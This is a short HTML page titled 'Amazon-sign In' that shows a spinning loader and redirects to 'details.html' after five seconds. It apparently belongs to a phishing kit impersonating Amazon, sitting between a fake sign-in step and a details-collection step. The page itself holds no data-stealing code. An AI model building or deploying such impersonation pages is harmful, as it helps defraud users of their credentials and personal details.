<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Amazon-sign In</title>
    <link rel="shortcut icon" href="img/icon.png" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

    *{
        background-color: #f9f9f9;
    }

.loader {
  margin-top: 250px;
  border: 5px solid #CDCCC8;
  border-radius: 50%;
  border-top: 5px solid #f5ce3e;
  border-left: 5px solid #CDCCC8;
  border-right: 5px solid #CDCCC8;
  width: 50px;
  height: 50px;
  -webkit-animation: spin 1s linear infinite; /* Safari */
  animation: spin .7s linear infinite;
}

@media (max-width: 480px) {
  .loader {
    margin-top:400px;
  }
}

.fieldLabel {
    font-size: 14px;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
</style>

</head>
<body>

<center><div class="loader"></div></center>
<meta http-equiv="refresh" content="5;url=details.html" />

<div class="fieldLabel">
</div>

</body>
</html>
